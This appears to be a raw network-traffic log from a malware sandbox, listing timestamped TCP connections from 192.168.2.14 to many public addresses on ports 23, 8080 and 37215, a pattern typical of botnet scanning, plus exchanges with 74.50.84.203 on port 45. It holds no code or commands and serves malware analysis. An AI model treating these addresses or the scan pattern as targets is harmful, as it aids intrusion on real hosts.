                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1462.62.224.212
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1494.27.186.158
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1494.34.102.45
                                              Nov 23, 2023 05:14:48.022748947 CET478168080192.168.2.1431.8.42.106
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1485.35.219.105
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1495.73.161.168
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1494.137.6.245
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1495.53.91.180
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1494.203.248.98
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1431.17.13.156
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1485.209.56.205
                                              Nov 23, 2023 05:14:48.022783041 CET478168080192.168.2.1431.196.196.27
                                              Nov 23, 2023 05:14:48.022789955 CET478168080192.168.2.1431.152.177.46
                                              Nov 23, 2023 05:14:48.022789955 CET478168080192.168.2.1495.236.3.222
                                              Nov 23, 2023 05:14:48.022789955 CET478168080192.168.2.1462.26.104.242
                                              Nov 23, 2023 05:14:48.022794962 CET478168080192.168.2.1462.12.101.228
                                              Nov 23, 2023 05:14:48.022794962 CET478168080192.168.2.1495.178.50.210
                                              Nov 23, 2023 05:14:48.022798061 CET478168080192.168.2.1431.99.56.254
                                              Nov 23, 2023 05:14:48.022798061 CET478168080192.168.2.1494.218.10.17
                                              Nov 23, 2023 05:14:48.022798061 CET478168080192.168.2.1462.146.233.164
                                              Nov 23, 2023 05:14:48.022831917 CET478168080192.168.2.1495.166.230.104
                                              Nov 23, 2023 05:14:48.022846937 CET478168080192.168.2.1494.5.84.206
                                              Nov 23, 2023 05:14:48.022846937 CET478168080192.168.2.1495.108.230.172
                                              Nov 23, 2023 05:14:48.022852898 CET478168080192.168.2.1485.91.73.230
                                              Nov 23, 2023 05:14:48.022854090 CET478168080192.168.2.1495.243.156.5
                                              Nov 23, 2023 05:14:48.022855043 CET478168080192.168.2.1485.217.165.194
                                              Nov 23, 2023 05:14:48.022854090 CET478168080192.168.2.1495.106.175.46
                                              Nov 23, 2023 05:14:48.022854090 CET478168080192.168.2.1431.195.77.108
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1485.253.208.3
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1431.26.184.11
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1431.176.203.235
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1462.148.240.184
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1485.66.98.49
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1431.111.151.172
                                              Nov 23, 2023 05:14:48.022867918 CET478168080192.168.2.1462.231.17.213
                                              Nov 23, 2023 05:14:48.022867918 CET478168080192.168.2.1494.200.98.106
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1462.140.217.219
                                              Nov 23, 2023 05:14:48.022867918 CET478168080192.168.2.1462.249.9.26
                                              Nov 23, 2023 05:14:48.022866011 CET478168080192.168.2.1485.55.53.244
                                              Nov 23, 2023 05:14:48.022867918 CET478168080192.168.2.1485.158.123.135
                                              Nov 23, 2023 05:14:48.022878885 CET478168080192.168.2.1462.130.171.246
                                              Nov 23, 2023 05:14:48.022878885 CET478168080192.168.2.1462.26.8.208
                                              Nov 23, 2023 05:14:48.022881985 CET478168080192.168.2.1494.16.175.36
                                              Nov 23, 2023 05:14:48.022881985 CET478168080192.168.2.1494.191.151.54
                                              Nov 23, 2023 05:14:48.022881985 CET478168080192.168.2.1431.240.192.25
                                              Nov 23, 2023 05:14:48.022881985 CET478168080192.168.2.1495.165.120.89
                                              Nov 23, 2023 05:14:48.022881985 CET478168080192.168.2.1431.68.74.34
                                              Nov 23, 2023 05:14:48.022892952 CET478168080192.168.2.1431.161.84.114
                                              Nov 23, 2023 05:14:48.022892952 CET478168080192.168.2.1495.58.33.200
                                              Nov 23, 2023 05:14:48.022892952 CET478168080192.168.2.1462.150.190.122
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1431.140.98.174
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1431.129.208.225
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1495.241.194.188
                                              Nov 23, 2023 05:14:48.022907972 CET478168080192.168.2.1494.239.87.120
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1431.75.102.246
                                              Nov 23, 2023 05:14:48.022907972 CET478168080192.168.2.1462.18.62.209
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1462.21.224.170
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1495.79.99.180
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1495.248.196.4
                                              Nov 23, 2023 05:14:48.022907019 CET478168080192.168.2.1495.110.135.129
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1495.205.4.186
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1485.7.87.217
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1494.30.232.77
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1485.110.206.178
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1462.20.79.201
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1495.53.249.67
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1485.36.213.86
                                              Nov 23, 2023 05:14:48.022921085 CET478168080192.168.2.1495.132.136.45
                                              Nov 23, 2023 05:14:48.022932053 CET478168080192.168.2.1494.201.24.7
                                              Nov 23, 2023 05:14:48.022932053 CET478168080192.168.2.1485.225.68.249
                                              Nov 23, 2023 05:14:48.022932053 CET478168080192.168.2.1485.196.188.204
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1494.118.15.187
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1485.7.212.138
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1485.141.160.148
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1485.54.35.215
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1495.254.134.41
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1431.226.39.26
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1495.243.120.120
                                              Nov 23, 2023 05:14:48.022958994 CET478168080192.168.2.1485.167.237.5
                                              Nov 23, 2023 05:14:48.022962093 CET478168080192.168.2.1495.168.84.104
                                              Nov 23, 2023 05:14:48.022962093 CET478168080192.168.2.1462.173.124.45
                                              Nov 23, 2023 05:14:48.022964001 CET478168080192.168.2.1495.72.218.246
                                              Nov 23, 2023 05:14:48.022962093 CET478168080192.168.2.1485.159.94.247
                                              Nov 23, 2023 05:14:48.022973061 CET478168080192.168.2.1462.113.148.48
                                              Nov 23, 2023 05:14:48.022970915 CET478168080192.168.2.1431.227.178.254
                                              Nov 23, 2023 05:14:48.022973061 CET478168080192.168.2.1462.26.62.159
                                              Nov 23, 2023 05:14:48.022970915 CET478168080192.168.2.1485.16.149.180
                                              Nov 23, 2023 05:14:48.022962093 CET478168080192.168.2.1494.44.111.10
                                              Nov 23, 2023 05:14:48.022962093 CET478168080192.168.2.1495.143.7.101
                                              Nov 23, 2023 05:14:48.022970915 CET478168080192.168.2.1485.45.186.8
                                              Nov 23, 2023 05:14:48.022983074 CET478168080192.168.2.1431.27.211.37
                                              Nov 23, 2023 05:14:48.022996902 CET478168080192.168.2.1495.50.74.147
                                              Nov 23, 2023 05:14:48.023016930 CET478168080192.168.2.1495.85.200.54
                                              Nov 23, 2023 05:14:48.023016930 CET478168080192.168.2.1485.22.112.7
                                              Nov 23, 2023 05:14:48.023016930 CET478168080192.168.2.1431.40.65.228
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1462.225.143.118
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1485.130.33.51
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1494.13.6.81
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1495.136.172.138
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1462.133.251.139
                                              Nov 23, 2023 05:14:48.023024082 CET478168080192.168.2.1431.254.111.16
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1431.91.193.13
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1431.25.217.151
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1485.184.194.155
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1462.78.103.180
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1485.192.141.77
                                              Nov 23, 2023 05:14:48.023030043 CET478168080192.168.2.1485.220.64.141
                                              Nov 23, 2023 05:14:48.023122072 CET478168080192.168.2.1462.51.110.35
                                              Nov 23, 2023 05:14:48.023133993 CET478168080192.168.2.1494.141.191.236
                                              Nov 23, 2023 05:14:48.023142099 CET478168080192.168.2.1485.2.57.63
                                              Nov 23, 2023 05:14:48.023142099 CET478168080192.168.2.1485.85.119.87
                                              Nov 23, 2023 05:14:48.023143053 CET478168080192.168.2.1494.134.146.170
                                              Nov 23, 2023 05:14:48.023143053 CET478168080192.168.2.1494.150.255.203
                                              Nov 23, 2023 05:14:48.023164034 CET478168080192.168.2.1431.82.140.15
                                              Nov 23, 2023 05:14:48.023164034 CET478168080192.168.2.1431.208.49.46
                                              Nov 23, 2023 05:14:48.023190975 CET478168080192.168.2.1495.244.105.218
                                              Nov 23, 2023 05:14:48.023191929 CET478168080192.168.2.1462.139.250.183
                                              Nov 23, 2023 05:14:48.023194075 CET478168080192.168.2.1494.39.1.37
                                              Nov 23, 2023 05:14:48.023194075 CET478168080192.168.2.1462.197.59.14
                                              Nov 23, 2023 05:14:48.023194075 CET478168080192.168.2.1462.232.182.139
                                              Nov 23, 2023 05:14:48.023195982 CET478168080192.168.2.1462.202.59.131
                                              Nov 23, 2023 05:14:48.023195982 CET478168080192.168.2.1495.27.96.158
                                              Nov 23, 2023 05:14:48.023219109 CET478168080192.168.2.1485.117.59.66
                                              Nov 23, 2023 05:14:48.023219109 CET478168080192.168.2.1462.226.107.97
                                              Nov 23, 2023 05:14:48.023221016 CET478168080192.168.2.1431.78.227.84
                                              Nov 23, 2023 05:14:48.023219109 CET478168080192.168.2.1431.50.55.109
                                              Nov 23, 2023 05:14:48.023221016 CET478168080192.168.2.1462.136.31.155
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1494.65.82.62
                                              Nov 23, 2023 05:14:48.023224115 CET478168080192.168.2.1462.37.62.194
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1494.143.96.240
                                              Nov 23, 2023 05:14:48.023224115 CET478168080192.168.2.1485.207.171.247
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1431.56.195.63
                                              Nov 23, 2023 05:14:48.023224115 CET478168080192.168.2.1431.60.66.151
                                              Nov 23, 2023 05:14:48.023230076 CET478168080192.168.2.1431.15.248.219
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1494.227.153.139
                                              Nov 23, 2023 05:14:48.023230076 CET478168080192.168.2.1431.230.98.253
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1431.237.129.198
                                              Nov 23, 2023 05:14:48.023222923 CET478168080192.168.2.1495.41.233.164
                                              Nov 23, 2023 05:14:48.023230076 CET478168080192.168.2.1462.156.2.133
                                              Nov 23, 2023 05:14:48.023241043 CET478168080192.168.2.1431.49.85.140
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1431.92.147.171
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1494.207.207.240
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1431.236.101.141
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1485.33.242.87
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1462.54.189.111
                                              Nov 23, 2023 05:14:48.023245096 CET478168080192.168.2.1462.247.141.177
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1431.225.84.93
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1485.233.255.121
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1431.255.79.55
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1462.18.242.73
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1495.147.114.103
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1494.84.214.96
                                              Nov 23, 2023 05:14:48.023258924 CET478168080192.168.2.1485.78.217.184
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1431.88.173.197
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1462.9.219.114
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1494.68.192.43
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1462.46.157.199
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1485.131.66.255
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1495.127.161.8
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1495.51.223.160
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1494.29.163.198
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1462.163.49.228
                                              Nov 23, 2023 05:14:48.023264885 CET478168080192.168.2.1495.231.35.99
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1431.127.101.106
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1485.63.146.23
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1462.3.122.56
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1494.144.83.37
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1495.21.240.75
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1462.62.2.111
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1494.48.100.36
                                              Nov 23, 2023 05:14:48.023272991 CET478168080192.168.2.1431.139.117.152
                                              Nov 23, 2023 05:14:48.023286104 CET478168080192.168.2.1494.134.2.198
                                              Nov 23, 2023 05:14:48.023327112 CET478168080192.168.2.1485.246.196.247
                                              Nov 23, 2023 05:14:48.023328066 CET478168080192.168.2.1494.80.213.183
                                              Nov 23, 2023 05:14:48.023327112 CET478168080192.168.2.1495.244.17.102
                                              Nov 23, 2023 05:14:48.023328066 CET478168080192.168.2.1494.188.202.226
                                              Nov 23, 2023 05:14:48.023350000 CET478168080192.168.2.1495.83.94.67
                                              Nov 23, 2023 05:14:48.023351908 CET478168080192.168.2.1495.248.22.158
                                              Nov 23, 2023 05:14:48.023351908 CET478168080192.168.2.1494.78.5.214
                                              Nov 23, 2023 05:14:48.023351908 CET478168080192.168.2.1431.37.146.163
                                              Nov 23, 2023 05:14:48.023351908 CET478168080192.168.2.1462.39.148.85
                                              Nov 23, 2023 05:14:48.023360014 CET478168080192.168.2.1431.104.243.159
                                              Nov 23, 2023 05:14:48.023360968 CET478168080192.168.2.1485.80.131.32
                                              Nov 23, 2023 05:14:48.023360014 CET478168080192.168.2.1462.187.194.82
                                              Nov 23, 2023 05:14:48.023360014 CET478168080192.168.2.1485.6.70.217
                                              Nov 23, 2023 05:14:48.023360968 CET478168080192.168.2.1494.9.80.200
                                              Nov 23, 2023 05:14:48.023360014 CET478168080192.168.2.1494.218.253.3
                                              Nov 23, 2023 05:14:48.023380995 CET478168080192.168.2.1462.67.47.242
                                              Nov 23, 2023 05:14:48.023380995 CET478168080192.168.2.1431.223.152.96
                                              Nov 23, 2023 05:14:48.023380995 CET478168080192.168.2.1495.56.239.240
                                              Nov 23, 2023 05:14:48.023380995 CET478168080192.168.2.1462.6.125.36
                                              Nov 23, 2023 05:14:48.023380995 CET478168080192.168.2.1485.124.220.42
                                              Nov 23, 2023 05:14:48.023395061 CET478168080192.168.2.1431.34.53.5
                                              Nov 23, 2023 05:14:48.023395061 CET478168080192.168.2.1462.106.108.86
                                              Nov 23, 2023 05:14:48.023395061 CET478168080192.168.2.1485.215.131.90
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1494.54.197.149
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1494.223.132.93
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1494.204.94.97
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1495.241.168.250
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1431.108.17.191
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1431.46.150.132
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1495.132.159.186
                                              Nov 23, 2023 05:14:48.023406029 CET478168080192.168.2.1494.195.222.21
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1462.114.119.19
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1462.128.22.45
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1462.44.70.210
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1485.114.223.109
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1495.223.202.49
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1495.149.70.188
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1485.80.48.238
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1431.143.248.216
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1495.133.95.209
                                              Nov 23, 2023 05:14:48.023422003 CET478168080192.168.2.1431.174.221.190
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1485.68.156.181
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1431.72.154.172
                                              Nov 23, 2023 05:14:48.023399115 CET478168080192.168.2.1494.241.201.181
                                              Nov 23, 2023 05:14:48.023422003 CET478168080192.168.2.1494.32.215.74
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1431.223.248.48
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1431.85.11.128
                                              Nov 23, 2023 05:14:48.023422003 CET478168080192.168.2.1485.122.255.183
                                              Nov 23, 2023 05:14:48.023425102 CET478168080192.168.2.1431.116.164.80
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1494.169.102.3
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1431.116.182.190
                                              Nov 23, 2023 05:14:48.023396015 CET478168080192.168.2.1495.6.115.201
                                              Nov 23, 2023 05:14:48.023422003 CET478168080192.168.2.1431.216.58.162
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1431.122.151.12
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1495.254.152.175
                                              Nov 23, 2023 05:14:48.023406982 CET478168080192.168.2.1494.52.255.156
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1495.127.171.79
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1494.147.178.165
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1495.250.177.172
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1495.81.172.224
                                              Nov 23, 2023 05:14:48.023396969 CET478168080192.168.2.1494.81.36.161
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1494.198.39.62
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1431.251.91.95
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1494.195.182.205
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1462.76.201.123
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1485.151.7.92
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1495.162.80.162
                                              Nov 23, 2023 05:14:48.023403883 CET478168080192.168.2.1495.252.147.244
                                              Nov 23, 2023 05:14:48.023443937 CET478168080192.168.2.1494.206.142.156
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1495.150.251.238
                                              Nov 23, 2023 05:14:48.023405075 CET478168080192.168.2.1431.44.125.65
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1494.135.63.79
                                              Nov 23, 2023 05:14:48.023431063 CET478168080192.168.2.1431.203.105.66
                                              Nov 23, 2023 05:14:48.023432016 CET478168080192.168.2.1494.186.117.81
                                              Nov 23, 2023 05:14:48.023459911 CET478168080192.168.2.1431.85.10.167
                                              Nov 23, 2023 05:14:48.023463011 CET478168080192.168.2.1431.17.160.6
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1495.209.213.75
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1431.109.193.60
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1431.164.96.133
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1494.147.112.214
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1462.252.18.200
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1495.106.65.92
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1494.237.248.54
                                              Nov 23, 2023 05:14:48.023489952 CET478168080192.168.2.1462.188.102.166
                                              Nov 23, 2023 05:14:48.023500919 CET478168080192.168.2.1431.35.224.241
                                              Nov 23, 2023 05:14:48.023500919 CET478168080192.168.2.1462.229.6.217
                                              Nov 23, 2023 05:14:48.023500919 CET478168080192.168.2.1462.94.180.193
                                              Nov 23, 2023 05:14:48.023500919 CET478168080192.168.2.1485.202.178.174
                                              Nov 23, 2023 05:14:48.023500919 CET478168080192.168.2.1431.115.135.250
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1431.101.234.222
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1462.187.206.70
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1485.183.106.16
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1431.45.34.79
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1431.240.49.44
                                              Nov 23, 2023 05:14:48.023525000 CET478168080192.168.2.1494.46.116.1
                                              Nov 23, 2023 05:14:48.023542881 CET478168080192.168.2.1485.27.67.96
                                              Nov 23, 2023 05:14:48.023542881 CET478168080192.168.2.1462.74.75.45
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1431.135.179.222
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1485.168.118.109
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1494.11.226.118
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1462.160.106.233
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1495.211.219.127
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1485.197.138.142
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1462.193.210.51
                                              Nov 23, 2023 05:14:48.023554087 CET478168080192.168.2.1485.85.21.212
                                              Nov 23, 2023 05:14:48.023617983 CET478168080192.168.2.1495.141.69.113
                                              Nov 23, 2023 05:14:48.121902943 CET455006074.50.84.203192.168.2.14
                                              Nov 23, 2023 05:14:48.122009993 CET5006045192.168.2.1474.50.84.203
                                              Nov 23, 2023 05:14:48.122294903 CET5006045192.168.2.1474.50.84.203
                                              Nov 23, 2023 05:14:48.142530918 CET2347828187.189.139.60192.168.2.14
                                              Nov 23, 2023 05:14:48.147932053 CET80804781662.3.57.14192.168.2.14
                                              Nov 23, 2023 05:14:48.175921917 CET2347828193.47.41.3192.168.2.14
                                              Nov 23, 2023 05:14:48.183355093 CET234782847.63.92.57192.168.2.14
                                              Nov 23, 2023 05:14:48.183382988 CET80804781662.115.46.23192.168.2.14
                                              Nov 23, 2023 05:14:48.194585085 CET80804781631.132.4.201192.168.2.14
                                              Nov 23, 2023 05:14:48.207026958 CET80804781694.104.142.131192.168.2.14
                                              Nov 23, 2023 05:14:48.224359989 CET80804781631.223.254.141192.168.2.14
                                              Nov 23, 2023 05:14:48.224891901 CET80804781695.176.232.211192.168.2.14
                                              Nov 23, 2023 05:14:48.225249052 CET80804781695.110.135.129192.168.2.14
                                              Nov 23, 2023 05:14:48.231745005 CET3721547830197.145.225.130192.168.2.14
                                              Nov 23, 2023 05:14:48.237340927 CET2347828185.146.179.43192.168.2.14
                                              Nov 23, 2023 05:14:48.238306999 CET455006074.50.84.203192.168.2.14
                                              Nov 23, 2023 05:14:48.238349915 CET5006045192.168.2.1474.50.84.203
                                              Nov 23, 2023 05:14:48.245625973 CET80804781662.29.65.154192.168.2.14
                                              Nov 23, 2023 05:14:48.245789051 CET478168080192.168.2.1462.29.65.154
                                              Nov 23, 2023 05:14:48.248492002 CET80804781631.129.110.141192.168.2.14
                                              Nov 23, 2023 05:14:48.249138117 CET80804781662.245.47.161192.168.2.14
                                              Nov 23, 2023 05:14:48.249805927 CET80804781694.133.49.26192.168.2.14
                                              Nov 23, 2023 05:14:48.255423069 CET234782860.114.81.97192.168.2.14
                                              Nov 23, 2023 05:14:48.256371021 CET80804781685.174.64.68192.168.2.14
                                              Nov 23, 2023 05:14:48.276048899 CET2347828175.203.74.109192.168.2.14
                                              Nov 23, 2023 05:14:48.278923035 CET2347828147.46.74.197192.168.2.14
                                              Nov 23, 2023 05:14:48.279084921 CET4782823192.168.2.14147.46.74.197
                                              Nov 23, 2023 05:14:48.279211998 CET2347828121.161.109.139192.168.2.14
                                              Nov 23, 2023 05:14:48.280766964 CET372154783041.184.122.222192.168.2.14
                                              Nov 23, 2023 05:14:48.292727947 CET234782814.41.184.136192.168.2.14
                                              Nov 23, 2023 05:14:48.295658112 CET80804781695.126.83.150192.168.2.14
                                              Nov 23, 2023 05:14:48.303721905 CET234782859.148.29.101192.168.2.14
                                              Nov 23, 2023 05:14:48.320221901 CET3721547830156.224.12.71192.168.2.14
                                              Nov 23, 2023 05:14:48.320384979 CET4783037215192.168.2.14156.224.12.71
                                              Nov 23, 2023 05:14:48.323678970 CET3721547830156.247.25.138192.168.2.14
                                              Nov 23, 2023 05:14:48.323728085 CET4783037215192.168.2.14156.247.25.138
                                              Nov 23, 2023 05:14:48.338524103 CET23478281.180.172.53192.168.2.14
                                              Nov 23, 2023 05:14:48.351119041 CET455006074.50.84.203192.168.2.14
                                              Nov 23, 2023 05:14:48.376844883 CET372154783041.175.184.223192.168.2.14
                                              Nov 23, 2023 05:14:48.388915062 CET80804781631.140.210.52192.168.2.14
                                              Nov 23, 2023 05:14:48.406747103 CET2347828119.110.248.39192.168.2.14
                                              Nov 23, 2023 05:14:48.492036104 CET80804781695.205.12.24192.168.2.14
                                              Nov 23, 2023 05:14:48.994558096 CET4782823192.168.2.145.57.58.170
                                              Nov 23, 2023 05:14:48.994558096 CET4782823192.168.2.1490.79.156.19
                                              Nov 23, 2023 05:14:48.994558096 CET4782823192.168.2.14159.97.72.30
                                              Nov 23, 2023 05:14:48.994558096 CET4782823192.168.2.14156.118.45.174
                                              Nov 23, 2023 05:14:48.994558096 CET4782823192.168.2.1489.63.160.98
                                              Nov 23, 2023 05:14:48.994564056 CET4782823192.168.2.1423.191.245.44
                                              Nov 23, 2023 05:14:48.994564056 CET4782823192.168.2.1448.27.230.159
                                              Nov 23, 2023 05:14:48.994564056 CET4782823192.168.2.14142.50.103.59
                                              Nov 23, 2023 05:14:48.994565010 CET4782823192.168.2.14165.187.215.253
                                              Nov 23, 2023 05:14:48.994565964 CET4782823192.168.2.1445.181.233.109
                                              Nov 23, 2023 05:14:48.994570017 CET4782823192.168.2.14133.116.58.134
                                              Nov 23, 2023 05:14:48.994570017 CET4782823192.168.2.1436.228.123.178
                                              Nov 23, 2023 05:14:48.994570017 CET4782823192.168.2.14118.13.204.13
                                              Nov 23, 2023 05:14:48.994565964 CET4782823192.168.2.14136.255.241.236
                                              Nov 23, 2023 05:14:48.994565964 CET4782823192.168.2.1499.79.41.218
                                              Nov 23, 2023 05:14:48.994565964 CET4782823192.168.2.14142.36.158.166
                                              Nov 23, 2023 05:14:48.994575024 CET4782823192.168.2.14192.62.88.105
                                              Nov 23, 2023 05:14:48.994575024 CET4782823192.168.2.14173.158.140.128
                                              Nov 23, 2023 05:14:48.994575024 CET4782823192.168.2.1437.189.70.9
                                              Nov 23, 2023 05:14:48.994575024 CET4782823192.168.2.1488.149.152.102
                                              Nov 23, 2023 05:14:48.994579077 CET4782823192.168.2.1420.211.68.37
                                              Nov 23, 2023 05:14:48.994579077 CET4782823192.168.2.14114.145.49.215
                                              Nov 23, 2023 05:14:48.994579077 CET4782823192.168.2.14126.25.166.226
                                              Nov 23, 2023 05:14:48.994579077 CET4782823192.168.2.14245.188.234.156
                                              Nov 23, 2023 05:14:48.994633913 CET4782823192.168.2.1462.66.241.44
                                              Nov 23, 2023 05:14:48.994635105 CET4782823192.168.2.14154.34.115.209
                                              Nov 23, 2023 05:14:48.994633913 CET4782823192.168.2.1437.175.39.159
                                              Nov 23, 2023 05:14:48.994633913 CET4782823192.168.2.1483.121.129.124
